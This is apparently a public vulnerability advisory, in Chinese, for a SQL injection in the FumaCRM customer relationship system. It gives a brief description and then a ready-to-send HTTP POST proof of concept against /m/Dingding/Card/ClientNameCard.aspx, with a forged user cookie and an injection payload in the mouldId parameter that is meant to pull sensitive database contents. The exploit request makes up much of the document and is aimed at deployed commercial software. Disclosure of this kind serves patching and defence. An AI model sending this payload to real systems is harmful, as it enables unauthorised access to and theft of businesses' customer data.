孚盟云 CRM /m/Dingding/Card/ClientNameCard.aspx SQL 注入漏洞

2026-04-30 孚盟云CRM PoC Public

Description

孚盟云CRM(FumaCRM)是上海孚盟软件有限公司推出的一款面向外贸企业的客户关系管理系统,提供客户管理、销售管理、邮件营销、订单管理等核心功能,广泛应用于外贸、制造、商贸等行业。孚盟云CRM的 /m/Dingding/Card/ClientNameCard.aspx 接口存在SQL注入漏洞,攻击者可通过 mouldId 构造恶意SQL语句,获取数据库敏感信息。

PoC

POST /m/Dingding/Card/ClientNameCard.aspx HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Cookie: UserCookie={"empId":"1","corpId": "1"}
Accept-Encoding: gzip

mouldId=admin'-1/user-- -

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities